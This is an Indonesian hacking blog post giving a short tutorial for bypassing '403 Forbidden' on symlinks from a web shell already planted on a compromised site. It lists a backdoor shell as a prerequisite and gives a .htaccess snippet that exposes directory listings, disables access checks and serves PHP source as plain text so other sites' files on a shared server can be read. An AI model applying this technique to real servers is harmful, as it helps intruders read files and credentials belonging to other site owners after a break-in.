Bypass Symlink Forbidden 403

Oke Kali ini saya akan post tutorial Bypass Symlink Forbidden 403 . Mungkin para mastah sudah mengetahuinya :) Oke cekidot

tidak ada beda nya dengan sebelum nya internal server error yang mungkin bikin kalian kesal karena tidak bisa Symlink :v oke sabar aja gan disini saya akan memberi tutorial singkat bypass nya :v

Untuk cara bypass bisa dibilang cukup mudah bahkan agak sulit juga  :v

Bahan-bahan :

1. Shell backdoor yang tertanam di web yang mau di symlink
2. Web yang mau disymlink vuln/bisa
3.Kopi udud jan lupa gan :v

Prof of Concept :
1. Masuk ke folder/dir symlink kalian

2. Buat new file/file baru buat .htaccess di dalam folder yang dibuat tadi.
nb : *ingat ya htaccess pake . (titik) di depan nama htaccess jadi .htaccess

3. Isi .htaccess dengan kode berikut

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any


4. Save file tersebut dan lihat hasilnya 
Oke gan dah bisa tinggal di anuin :v

NB :

Tidak semua work 100% , tergantung server pased/Php versinya

Sekian tutor kali ini semoga bermanfaat :*
Marcadores:

Post a Comment

PkDomain (PVT) Limited is a provider of Shared, Reseller, VPS and Dedicated Web hosting, Web Designing & Development in all over Pakistan. Privately held and based in San Francisco, California, USA, the company was founded in 2002 by young entrepreneur.The Company is also providing Surveillance services all over Pakistan from 2012. You can check latest prices and packages on www.pkdomain.com.pk. The Company has also setup its International offices in various countries all over the world and maintaining web hosting servers from San Francisco, California.

[blogger]

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget